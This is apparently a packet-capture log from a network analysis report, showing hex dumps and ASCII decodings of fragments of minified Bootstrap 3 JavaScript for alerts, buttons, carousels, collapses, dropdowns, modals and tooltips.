                                                                                2023-10-12 15:42:16 UTC939INData Raw: 2e 62 73 2e 61 6c 65 72 74 22 29 29 2c 62 2e 69 73 44 65 66 61 75 6c 74 50 72 65 76 65 6e 74 65 64 28 29 7c 7c 28 67 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 69 6e 22 29 2c 61 2e 73 75 70 70 6f 72 74 2e 74 72 61 6e 73 69 74 69 6f 6e 26 26 67 2e 68 61 73 43 6c 61 73 73 28 22 66 61 64 65 22 29 3f 67 2e 6f 6e 65 28 22 62 73 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 22 2c 63 29 2e 65 6d 75 6c 61 74 65 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 28 64 2e 54 52 41 4e 53 49 54 49 4f 4e 5f 44 55 52 41 54 49 4f 4e 29 3a 63 28 29 29 7d 3b 76 61 72 20 65 3d 61 2e 66 6e 2e 61 6c 65 72 74 3b 61 2e 66 6e 2e 61 6c 65 72 74 3d 62 2c 61 2e 66 6e 2e 61 6c 65 72 74 2e 43 6f 6e 73 74 72 75 63 74 6f 72 3d 64 2c 61 2e 66 6e 2e 61 6c 65 72 74 2e 6e 6f 43 6f 6e 66 6c 69 63 74 3d 66 75
                                                                                Data Ascii: .bs.alert")),b.isDefaultPrevented()||(g.removeClass("in"),a.support.transition&&g.hasClass("fade")?g.one("bsTransitionEnd",c).emulateTransitionEnd(d.TRANSITION_DURATION):c())};var e=a.fn.alert;a.fn.alert=b,a.fn.alert.Constructor=d,a.fn.alert.noConflict=fu
                                                                                2023-10-12 15:42:16 UTC940INData Raw: 69 76 65 22 29 29 3a 22 63 68 65 63 6b 62 6f 78 22 3d 3d 63 2e 70 72 6f 70 28 22 74 79 70 65 22 29 26 26 28 63 2e 70 72 6f 70 28 22 63 68 65 63 6b 65 64 22 29 21 3d 3d 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 68 61 73 43 6c 61 73 73 28 22 61 63 74 69 76 65 22 29 26 26 28 61 3d 21 31 29 2c 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 74 6f 67 67 6c 65 43 6c 61 73 73 28 22 61 63 74 69 76 65 22 29 29 2c 63 2e 70 72 6f 70 28 22 63 68 65 63 6b 65 64 22 2c 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 68 61 73 43 6c 61 73 73 28 22 61 63 74 69 76 65 22 29 29 2c 61 26 26 63 2e 74 72 69 67 67 65 72 28 22 63 68 61 6e 67 65 22 29 7d 65 6c 73 65 20 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 61 74 74 72 28 22 61 72 69 61 2d 70 72 65 73 73 65 64 22 2c 21 74 68 69 73 2e 24 65
                                                                                Data Ascii: ive")):"checkbox"==c.prop("type")&&(c.prop("checked")!==this.$element.hasClass("active")&&(a=!1),this.$element.toggleClass("active")),c.prop("checked",this.$element.hasClass("active")),a&&c.trigger("change")}else this.$element.attr("aria-pressed",!this.$e
                                                                                2023-10-12 15:42:16 UTC942INData Raw: 3d 6e 75 6c 6c 2c 74 68 69 73 2e 73 6c 69 64 69 6e 67 3d 6e 75 6c 6c 2c 74 68 69 73 2e 69 6e 74 65 72 76 61 6c 3d 6e 75 6c 6c 2c 74 68 69 73 2e 24 61 63 74 69 76 65 3d 6e 75 6c 6c 2c 74 68 69 73 2e 24 69 74 65 6d 73 3d 6e 75 6c 6c 2c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 6b 65 79 62 6f 61 72 64 26 26 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 6f 6e 28 22 6b 65 79 64 6f 77 6e 2e 62 73 2e 63 61 72 6f 75 73 65 6c 22 2c 61 2e 70 72 6f 78 79 28 74 68 69 73 2e 6b 65 79 64 6f 77 6e 2c 74 68 69 73 29 29 2c 22 68 6f 76 65 72 22 3d 3d 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 70 61 75 73 65 26 26 21 28 22 6f 6e 74 6f 75 63 68 73 74 61 72 74 22 69 6e 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 29 26 26 74 68 69 73 2e 24 65 6c 65 6d 65 6e
                                                                                Data Ascii: =null,this.sliding=null,this.interval=null,this.$active=null,this.$items=null,this.options.keyboard&&this.$element.on("keydown.bs.carousel",a.proxy(this.keydown,this)),"hover"==this.options.pause&&!("ontouchstart"in document.documentElement)&&this.$elemen
                                                                                2023-10-12 15:42:16 UTC943INData Raw: 72 65 74 75 72 6e 20 74 68 69 73 2e 73 6c 69 64 69 6e 67 3f 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 6f 6e 65 28 22 73 6c 69 64 2e 62 73 2e 63 61 72 6f 75 73 65 6c 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 62 2e 74 6f 28 61 29 7d 29 3a 63 3d 3d 61 3f 74 68 69 73 2e 70 61 75 73 65 28 29 2e 63 79 63 6c 65 28 29 3a 74 68 69 73 2e 73 6c 69 64 65 28 61 3e 63 3f 22 6e 65 78 74 22 3a 22 70 72 65 76 22 2c 74 68 69 73 2e 24 69 74 65 6d 73 2e 65 71 28 61 29 29 7d 2c 63 2e 70 72 6f 74 6f 74 79 70 65 2e 70 61 75 73 65 3d 66 75 6e 63 74 69 6f 6e 28 62 29 7b 72 65 74 75 72 6e 20 62 7c 7c 28 74 68 69 73 2e 70 61 75 73 65 64 3d 21 30 29 2c 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 66 69 6e 64 28 22 2e 6e 65 78 74 2c 20 2e 70 72 65 76 22 29 2e 6c 65 6e 67 74 68 26 26 61 2e
                                                                                Data Ascii: return this.sliding?this.$element.one("slid.bs.carousel",function(){b.to(a)}):c==a?this.pause().cycle():this.slide(a>c?"next":"prev",this.$items.eq(a))},c.prototype.pause=function(b){return b||(this.paused=!0),this.$element.find(".next, .prev").length&&a.
                                                                                2023-10-12 15:42:16 UTC944INData Raw: 69 2e 73 6c 69 64 69 6e 67 3d 21 31 2c 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 2e 24 65 6c 65 6d 65 6e 74 2e 74 72 69 67 67 65 72 28 6d 29 7d 2c 30 29 7d 29 2e 65 6d 75 6c 61 74 65 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 28 63 2e 54 52 41 4e 53 49 54 49 4f 4e 5f 44 55 52 41 54 49 4f 4e 29 29 3a 28 65 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 61 63 74 69 76 65 22 29 2c 66 2e 61 64 64 43 6c 61 73 73 28 22 61 63 74 69 76 65 22 29 2c 74 68 69 73 2e 73 6c 69 64 69 6e 67 3d 21 31 2c 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 74 72 69 67 67 65 72 28 6d 29 29 2c 67 26 26 74 68 69 73 2e 63 79 63 6c 65 28 29 2c 74 68 69 73 7d 7d 3b 76 61 72 20 64 3d 61 2e 66 6e 2e 63 61 72 6f 75 73 65 6c 3b 61 2e 66 6e 2e 63 61 72 6f 75 73 65 6c 3d 62 2c
                                                                                Data Ascii: i.sliding=!1,setTimeout(function(){i.$element.trigger(m)},0)}).emulateTransitionEnd(c.TRANSITION_DURATION)):(e.removeClass("active"),f.addClass("active"),this.sliding=!1,this.$element.trigger(m)),g&&this.cycle(),this}};var d=a.fn.carousel;a.fn.carousel=b,
                                                                                2023-10-12 15:42:16 UTC946INData Raw: 63 6f 6c 6c 61 70 73 65 22 5d 5b 68 72 65 66 3d 22 23 27 2b 62 2e 69 64 2b 27 22 5d 2c 5b 64 61 74 61 2d 74 6f 67 67 6c 65 3d 22 63 6f 6c 6c 61 70 73 65 22 5d 5b 64 61 74 61 2d 74 61 72 67 65 74 3d 22 23 27 2b 62 2e 69 64 2b 27 22 5d 27 29 2c 74 68 69 73 2e 74 72 61 6e 73 69 74 69 6f 6e 69 6e 67 3d 6e 75 6c 6c 2c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 70 61 72 65 6e 74 3f 74 68 69 73 2e 24 70 61 72 65 6e 74 3d 74 68 69 73 2e 67 65 74 50 61 72 65 6e 74 28 29 3a 74 68 69 73 2e 61 64 64 41 72 69 61 41 6e 64 43 6f 6c 6c 61 70 73 65 64 43 6c 61 73 73 28 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2c 74 68 69 73 2e 24 74 72 69 67 67 65 72 29 2c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 74 6f 67 67 6c 65 26 26 74 68 69 73 2e 74 6f 67 67 6c 65 28 29 7d 3b 64 2e 56 45 52
                                                                                Data Ascii: collapse"][href="#'+b.id+'"],[data-toggle="collapse"][data-target="#'+b.id+'"]'),this.transitioning=null,this.options.parent?this.$parent=this.getParent():this.addAriaAndCollapsedClass(this.$element,this.$trigger),this.options.toggle&&this.toggle()};d.VER
                                                                                2023-10-12 15:42:16 UTC947INData Raw: 70 65 2e 68 69 64 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 21 74 68 69 73 2e 74 72 61 6e 73 69 74 69 6f 6e 69 6e 67 26 26 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 68 61 73 43 6c 61 73 73 28 22 69 6e 22 29 29 7b 76 61 72 20 62 3d 61 2e 45 76 65 6e 74 28 22 68 69 64 65 2e 62 73 2e 63 6f 6c 6c 61 70 73 65 22 29 3b 69 66 28 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 74 72 69 67 67 65 72 28 62 29 2c 21 62 2e 69 73 44 65 66 61 75 6c 74 50 72 65 76 65 6e 74 65 64 28 29 29 7b 76 61 72 20 63 3d 74 68 69 73 2e 64 69 6d 65 6e 73 69 6f 6e 28 29 3b 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 5b 63 5d 28 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 5b 63 5d 28 29 29 5b 30 5d 2e 6f 66 66 73 65 74 48 65 69 67 68 74 2c 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 61 64 64 43 6c
                                                                                Data Ascii: pe.hide=function(){if(!this.transitioning&&this.$element.hasClass("in")){var b=a.Event("hide.bs.collapse");if(this.$element.trigger(b),!b.isDefaultPrevented()){var c=this.dimension();this.$element[c](this.$element[c]())[0].offsetHeight,this.$element.addCl
                                                                                2023-10-12 15:42:16 UTC954INData Raw: 3d 61 28 74 68 69 73 29 3b 65 2e 61 74 74 72 28 22 64 61 74 61 2d 74 61 72 67 65 74 22 29 7c 7c 64 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 3b 76 61 72 20 66 3d 62 28 65 29 2c 67 3d 66 2e 64 61 74 61 28 22 62 73 2e 63 6f 6c 6c 61 70 73 65 22 29 2c 68 3d 67 3f 22 74 6f 67 67 6c 65 22 3a 65 2e 64 61 74 61 28 29 3b 63 2e 63 61 6c 6c 28 66 2c 68 29 7d 29 7d 28 6a 51 75 65 72 79 29 2c 2b 66 75 6e 63 74 69 6f 6e 28 61 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 62 28 62 29 7b 76 61 72 20 63 3d 62 2e 61 74 74 72 28 22 64 61 74 61 2d 74 61 72 67 65 74 22 29 3b 63 7c 7c 28 63 3d 62 2e 61 74 74 72 28 22 68 72 65 66 22 29 2c 63 3d 63 26 26 2f 23 5b 41 2d 5a 61 2d 7a 5d 2f 2e 74 65 73 74 28 63 29 26 26 63 2e 72 65 70 6c 61 63 65
                                                                                Data Ascii: =a(this);e.attr("data-target")||d.preventDefault();var f=b(e),g=f.data("bs.collapse"),h=g?"toggle":e.data();c.call(f,h)})}(jQuery),+function(a){"use strict";function b(b){var c=b.attr("data-target");c||(c=b.attr("href"),c=c&&/#[A-Za-z]/.test(c)&&c.replace
                                                                                2023-10-12 15:42:16 UTC955INData Raw: 2e 69 73 44 65 66 61 75 6c 74 50 72 65 76 65 6e 74 65 64 28 29 29 72 65 74 75 72 6e 3b 65 2e 74 72 69 67 67 65 72 28 22 66 6f 63 75 73 22 29 2e 61 74 74 72 28 22 61 72 69 61 2d 65 78 70 61 6e 64 65 64 22 2c 22 74 72 75 65 22 29 2c 66 2e 74 6f 67 67 6c 65 43 6c 61 73 73 28 22 6f 70 65 6e 22 29 2e 74 72 69 67 67 65 72 28 61 2e 45 76 65 6e 74 28 22 73 68 6f 77 6e 2e 62 73 2e 64 72 6f 70 64 6f 77 6e 22 2c 68 29 29 7d 72 65 74 75 72 6e 21 31 7d 7d 2c 67 2e 70 72 6f 74 6f 74 79 70 65 2e 6b 65 79 64 6f 77 6e 3d 66 75 6e 63 74 69 6f 6e 28 63 29 7b 69 66 28 2f 28 33 38 7c 34 30 7c 32 37 7c 33 32 29 2f 2e 74 65 73 74 28 63 2e 77 68 69 63 68 29 26 26 21 2f 69 6e 70 75 74 7c 74 65 78 74 61 72 65 61 2f 69 2e 74 65 73 74 28 63 2e 74 61 72 67 65 74 2e 74 61 67 4e 61 6d
                                                                                Data Ascii: .isDefaultPrevented())return;e.trigger("focus").attr("aria-expanded","true"),f.toggleClass("open").trigger(a.Event("shown.bs.dropdown",h))}return!1}},g.prototype.keydown=function(c){if(/(38|40|27|32)/.test(c.which)&&!/input|textarea/i.test(c.target.tagNam
                                                                                2023-10-12 15:42:16 UTC956INData Raw: 7d 29 7d 76 61 72 20 63 3d 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 74 68 69 73 2e 6f 70 74 69 6f 6e 73 3d 63 2c 74 68 69 73 2e 24 62 6f 64 79 3d 61 28 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 29 2c 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 3d 61 28 62 29 2c 74 68 69 73 2e 24 64 69 61 6c 6f 67 3d 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 66 69 6e 64 28 22 2e 6d 6f 64 61 6c 2d 64 69 61 6c 6f 67 22 29 2c 74 68 69 73 2e 24 62 61 63 6b 64 72 6f 70 3d 6e 75 6c 6c 2c 74 68 69 73 2e 69 73 53 68 6f 77 6e 3d 6e 75 6c 6c 2c 74 68 69 73 2e 6f 72 69 67 69 6e 61 6c 42 6f 64 79 50 61 64 3d 6e 75 6c 6c 2c 74 68 69 73 2e 73 63 72 6f 6c 6c 62 61 72 57 69 64 74 68 3d 30 2c 74 68 69 73 2e 69 67 6e 6f 72 65 42 61 63 6b 64 72 6f 70 43 6c 69 63 6b 3d 21 31 2c 74 68 69 73 2e 6f 70
                                                                                Data Ascii: })}var c=function(b,c){this.options=c,this.$body=a(document.body),this.$element=a(b),this.$dialog=this.$element.find(".modal-dialog"),this.$backdrop=null,this.isShown=null,this.originalBodyPad=null,this.scrollbarWidth=0,this.ignoreBackdropClick=!1,this.op
                                                                                2023-10-12 15:42:16 UTC958INData Raw: 22 29 2c 64 2e 65 6e 66 6f 72 63 65 46 6f 63 75 73 28 29 3b 76 61 72 20 66 3d 61 2e 45 76 65 6e 74 28 22 73 68 6f 77 6e 2e 62 73 2e 6d 6f 64 61 6c 22 2c 7b 72 65 6c 61 74 65 64 54 61 72 67 65 74 3a 62 7d 29 3b 65 3f 64 2e 24 64 69 61 6c 6f 67 2e 6f 6e 65 28 22 62 73 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 64 2e 24 65 6c 65 6d 65 6e 74 2e 74 72 69 67 67 65 72 28 22 66 6f 63 75 73 22 29 2e 74 72 69 67 67 65 72 28 66 29 7d 29 2e 65 6d 75 6c 61 74 65 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 28 63 2e 54 52 41 4e 53 49 54 49 4f 4e 5f 44 55 52 41 54 49 4f 4e 29 3a 64 2e 24 65 6c 65 6d 65 6e 74 2e 74 72 69 67 67 65 72 28 22 66 6f 63 75 73 22 29 2e 74 72 69 67 67 65 72 28 66 29 7d 29 29 7d 2c 63 2e 70 72 6f 74 6f 74 79 70 65 2e
                                                                                Data Ascii: "),d.enforceFocus();var f=a.Event("shown.bs.modal",{relatedTarget:b});e?d.$dialog.one("bsTransitionEnd",function(){d.$element.trigger("focus").trigger(f)}).emulateTransitionEnd(c.TRANSITION_DURATION):d.$element.trigger("focus").trigger(f)}))},c.prototype.
                                                                                2023-10-12 15:42:16 UTC967INData Raw: 2e 6f 66 66 28 22 72 65 73 69 7a 65 2e 62 73 2e 6d 6f 64 61 6c 22 29 7d 2c 63 2e 70 72 6f 74 6f 74 79 70 65 2e 68 69 64 65 4d 6f 64 61 6c 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 74 68 69 73 3b 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 68 69 64 65 28 29 2c 74 68 69 73 2e 62 61 63 6b 64 72 6f 70 28 66 75 6e 63 74 69 6f 6e 28 29 7b 61 2e 24 62 6f 64 79 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 6d 6f 64 61 6c 2d 6f 70 65 6e 22 29 2c 61 2e 72 65 73 65 74 41 64 6a 75 73 74 6d 65 6e 74 73 28 29 2c 61 2e 72 65 73 65 74 53 63 72 6f 6c 6c 62 61 72 28 29 2c 61 2e 24 65 6c 65 6d 65 6e 74 2e 74 72 69 67 67 65 72 28 22 68 69 64 64 65 6e 2e 62 73 2e 6d 6f 64 61 6c 22 29 7d 29 7d 2c 63 2e 70 72 6f 74 6f 74 79 70 65 2e 72 65 6d 6f 76 65 42 61 63 6b 64 72 6f
                                                                                Data Ascii: .off("resize.bs.modal")},c.prototype.hideModal=function(){var a=this;this.$element.hide(),this.backdrop(function(){a.$body.removeClass("modal-open"),a.resetAdjustments(),a.resetScrollbar(),a.$element.trigger("hidden.bs.modal")})},c.prototype.removeBackdro
                                                                                2023-10-12 15:42:16 UTC968INData Raw: 6e 28 29 7b 76 61 72 20 61 3d 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 5b 30 5d 2e 73 63 72 6f 6c 6c 48 65 69 67 68 74 3e 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 63 6c 69 65 6e 74 48 65 69 67 68 74 3b 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 63 73 73 28 7b 70 61 64 64 69 6e 67 4c 65 66 74 3a 21 74 68 69 73 2e 62 6f 64 79 49 73 4f 76 65 72 66 6c 6f 77 69 6e 67 26 26 61 3f 74 68 69 73 2e 73 63 72 6f 6c 6c 62 61 72 57 69 64 74 68 3a 22 22 2c 70 61 64 64 69 6e 67 52 69 67 68 74 3a 74 68 69 73 2e 62 6f 64 79 49 73 4f 76 65 72 66 6c 6f 77 69 6e 67 26 26 21 61 3f 74 68 69 73 2e 73 63 72 6f 6c 6c 62 61 72 57 69 64 74 68 3a 22 22 7d 29 7d 2c 63 2e 70 72 6f 74 6f 74 79 70 65 2e 72 65 73 65 74 41 64 6a 75 73 74 6d 65 6e 74 73 3d 66
                                                                                Data Ascii: n(){var a=this.$element[0].scrollHeight>document.documentElement.clientHeight;this.$element.css({paddingLeft:!this.bodyIsOverflowing&&a?this.scrollbarWidth:"",paddingRight:this.bodyIsOverflowing&&!a?this.scrollbarWidth:""})},c.prototype.resetAdjustments=f
                                                                                2023-10-12 15:42:16 UTC970INData Raw: 2f 2c 22 22 29 29 2c 67 3d 66 2e 64 61 74 61 28 22 62 73 2e 6d 6f 64 61 6c 22 29 3f 22 74 6f 67 67 6c 65 22 3a 61 2e 65 78 74 65 6e 64 28 7b 72 65 6d 6f 74 65 3a 21 2f 23 2f 2e 74 65 73 74 28 65 29 26 26 65 7d 2c 66 2e 64 61 74 61 28 29 2c 64 2e 64 61 74 61 28 29 29 3b 64 2e 69 73 28 22 61 22 29 26 26 63 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 66 2e 6f 6e 65 28 22 73 68 6f 77 2e 62 73 2e 6d 6f 64 61 6c 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 2e 69 73 44 65 66 61 75 6c 74 50 72 65 76 65 6e 74 65 64 28 29 7c 7c 66 2e 6f 6e 65 28 22 68 69 64 64 65 6e 2e 62 73 2e 6d 6f 64 61 6c 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 64 2e 69 73 28 22 3a 76 69 73 69 62 6c 65 22 29 26 26 64 2e 74 72 69 67 67 65 72 28 22 66 6f 63 75 73 22 29 7d 29 7d 29 2c 62
                                                                                Data Ascii: /,"")),g=f.data("bs.modal")?"toggle":a.extend({remote:!/#/.test(e)&&e},f.data(),d.data());d.is("a")&&c.preventDefault(),f.one("show.bs.modal",function(a){a.isDefaultPrevented()||f.one("hidden.bs.modal",function(){d.is(":visible")&&d.trigger("focus")})}),b
                                                                                2023-10-12 15:42:16 UTC975INData Raw: 63 6f 6e 73 74 72 75 63 74 6f 72 26 26 21 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 73 65 6c 65 63 74 6f 72 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 60 73 65 6c 65 63 74 6f 72 60 20 6f 70 74 69 6f 6e 20 6d 75 73 74 20 62 65 20 73 70 65 63 69 66 69 65 64 20 77 68 65 6e 20 69 6e 69 74 69 61 6c 69 7a 69 6e 67 20 22 2b 74 68 69 73 2e 74 79 70 65 2b 22 20 6f 6e 20 74 68 65 20 77 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 20 6f 62 6a 65 63 74 21 22 29 3b 66 6f 72 28 76 61 72 20 65 3d 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 74 72 69 67 67 65 72 2e 73 70 6c 69 74 28 22 20 22 29 2c 66 3d 65 2e 6c 65 6e 67 74 68 3b 66 2d 2d 3b 29 7b 76 61 72 20 67 3d 65 5b 66 5d 3b 69 66 28 22 63 6c 69 63 6b 22 3d 3d 67 29 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 6f 6e 28
                                                                                Data Ascii: constructor&&!this.options.selector)throw new Error("`selector` option must be specified when initializing "+this.type+" on the window.document object!");for(var e=this.options.trigger.split(" "),f=e.length;f--;){var g=e[f];if("click"==g)this.$element.on(
                                                                                2023-10-12 15:42:16 UTC978INData Raw: 72 22 5d 3d 21 30 29 2c 63 2e 74 69 70 28 29 2e 68 61 73 43 6c 61 73 73 28 22 69 6e 22 29 7c 7c 22 69 6e 22 3d 3d 63 2e 68 6f 76 65 72 53 74 61 74 65 3f 76 6f 69 64 28 63 2e 68 6f 76 65 72 53 74 61 74 65 3d 22 69 6e 22 29 3a 28 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 63 2e 74 69 6d 65 6f 75 74 29 2c 63 2e 68 6f 76 65 72 53 74 61 74 65 3d 22 69 6e 22 2c 63 2e 6f 70 74 69 6f 6e 73 2e 64 65 6c 61 79 26 26 63 2e 6f 70 74 69 6f 6e 73 2e 64 65 6c 61 79 2e 73 68 6f 77 3f 76 6f 69 64 28 63 2e 74 69 6d 65 6f 75 74 3d 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 22 69 6e 22 3d 3d 63 2e 68 6f 76 65 72 53 74 61 74 65 26 26 63 2e 73 68 6f 77 28 29 7d 2c 63 2e 6f 70 74 69 6f 6e 73 2e 64 65 6c 61 79 2e 73 68 6f 77 29 29 3a 63 2e 73 68 6f 77 28 29 29
                                                                                Data Ascii: r"]=!0),c.tip().hasClass("in")||"in"==c.hoverState?void(c.hoverState="in"):(clearTimeout(c.timeout),c.hoverState="in",c.options.delay&&c.options.delay.show?void(c.timeout=setTimeout(function(){"in"==c.hoverState&&c.show()},c.options.delay.show)):c.show())
                                                                                2023-10-12 15:42:16 UTC979INData Raw: 65 6d 65 6e 74 5b 30 5d 29 3a 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 70 6c 61 63 65 6d 65 6e 74 2c 69 3d 2f 5c 73 3f 61 75 74 6f 3f 5c 73 3f 2f 69 2c 6a 3d 69 2e 74 65 73 74 28 68 29 3b 6a 26 26 28 68 3d 68 2e 72 65 70 6c 61 63 65 28 69 2c 22 22 29 7c 7c 22 74 6f 70 22 29 2c 66 2e 64 65 74 61 63 68 28 29 2e 63 73 73 28 7b 74 6f 70 3a 30 2c 6c 65 66 74 3a 30 2c 64 69 73 70 6c 61 79 3a 22 62 6c 6f 63 6b 22 7d 29 2e 61 64 64 43 6c 61 73 73 28 68 29 2e 64 61 74 61 28 22 62 73 2e 22 2b 74 68 69 73 2e 74 79 70 65 2c 74 68 69 73 29 2c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 63 6f 6e 74 61 69 6e 65 72 3f 66 2e 61 70 70 65 6e 64 54 6f 28 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 63 6f 6e 74 61 69 6e 65 72 29 3a 66 2e 69 6e 73 65 72 74 41 66 74 65 72 28 74 68 69 73 2e
                                                                                Data Ascii: ement[0]):this.options.placement,i=/\s?auto?\s?/i,j=i.test(h);j&&(h=h.replace(i,"")||"top"),f.detach().css({top:0,left:0,display:"block"}).addClass(h).data("bs."+this.type,this),this.options.container?f.appendTo(this.options.container):f.insertAfter(this.
                                                                                2023-10-12 15:42:16 UTC980INData Raw: 6c 74 61 28 63 2c 62 2c 69 2c 6a 29 3b 6b 2e 6c 65 66 74 3f 62 2e 6c 65 66 74 2b 3d 6b 2e 6c 65 66 74 3a 62 2e 74 6f 70 2b 3d 6b 2e 74 6f 70 3b 76 61 72 20 6c 3d 2f 74 6f 70 7c 62 6f 74 74 6f 6d 2f 2e 74 65 73 74 28 63 29 2c 6d 3d 6c 3f 32 2a 6b 2e 6c 65 66 74 2d 65 2b 69 3a 32 2a 6b 2e 74 6f 70 2d 66 2b 6a 2c 6e 3d 6c 3f 22 6f 66 66 73 65 74 57 69 64 74 68 22 3a 22 6f 66 66 73 65 74 48 65 69 67 68 74 22 3b 64 2e 6f 66 66 73 65 74 28 62 29 2c 74 68 69 73 2e 72 65 70 6c 61 63 65 41 72 72 6f 77 28 6d 2c 64 5b 30 5d 5b 6e 5d 2c 6c 29 7d 2c 63 2e 70 72 6f 74 6f 74 79 70 65 2e 72 65 70 6c 61 63 65 41 72 72 6f 77 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 74 68 69 73 2e 61 72 72 6f 77 28 29 2e 63 73 73 28 63 3f 22 6c 65 66 74 22 3a 22 74 6f 70 22 2c 35
                                                                                Data Ascii: lta(c,b,i,j);k.left?b.left+=k.left:b.top+=k.top;var l=/top|bottom/.test(c),m=l?2*k.left-e+i:2*k.top-f+j,n=l?"offsetWidth":"offsetHeight";d.offset(b),this.replaceArrow(m,d[0][n],l)},c.prototype.replaceArrow=function(a,b,c){this.arrow().css(c?"left":"top",5
                                                                                2023-10-12 15:42:16 UTC986INData Raw: 45 6c 65 6d 65 6e 74 26 26 63 20 69 6e 73 74 61 6e 63 65 6f 66 20 77 69 6e 64 6f 77 2e 53 56 47 45 6c 65 6d 65 6e 74 2c 67 3d 64 3f 7b 74 6f 70 3a 30 2c 6c 65 66 74 3a 30 7d 3a 66 3f 6e 75 6c 6c 3a 62 2e 6f 66 66 73 65 74 28 29 2c 68 3d 7b 73 63 72 6f 6c 6c 3a 64 3f 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 73 63 72 6f 6c 6c 54 6f 70 7c 7c 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 73 63 72 6f 6c 6c 54 6f 70 3a 62 2e 73 63 72 6f 6c 6c 54 6f 70 28 29 7d 2c 69 3d 64 3f 7b 77 69 64 74 68 3a 61 28 77 69 6e 64 6f 77 29 2e 77 69 64 74 68 28 29 2c 68 65 69 67 68 74 3a 61 28 77 69 6e 64 6f 77 29 2e 68 65 69 67 68 74 28 29 7d 3a 6e 75 6c 6c 3b 72 65 74 75 72 6e 20 61 2e 65 78 74 65 6e 64 28 7b 7d 2c 65 2c 68 2c 69 2c 67 29 7d 2c 63
                                                                                Data Ascii: Element&&c instanceof window.SVGElement,g=d?{top:0,left:0}:f?null:b.offset(),h={scroll:d?document.documentElement.scrollTop||document.body.scrollTop:b.scrollTop()},i=d?{width:a(window).width(),height:a(window).height()}:null;return a.extend({},e,h,i,g)},c
                                                                                2023-10-12 15:42:16 UTC987INData Raw: 6e 20 6d 75 73 74 20 63 6f 6e 73 69 73 74 20 6f 66 20 65 78 61 63 74 6c 79 20 31 20 74 6f 70 2d 6c 65 76 65 6c 20 65 6c 65 6d 65 6e 74 21 22 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 24 74 69 70 7d 2c 63 2e 70 72 6f 74 6f 74 79 70 65 2e 61 72 72 6f 77 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 24 61 72 72 6f 77 3d 74 68 69 73 2e 24 61 72 72 6f 77 7c 7c 74 68 69 73 2e 74 69 70 28 29 2e 66 69 6e 64 28 22 2e 74 6f 6f 6c 74 69 70 2d 61 72 72 6f 77 22 29 7d 2c 63 2e 70 72 6f 74 6f 74 79 70 65 2e 65 6e 61 62 6c 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 65 6e 61 62 6c 65 64 3d 21 30 7d 2c 63 2e 70 72 6f 74 6f 74 79 70 65 2e 64 69 73 61 62 6c 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 65 6e 61 62 6c 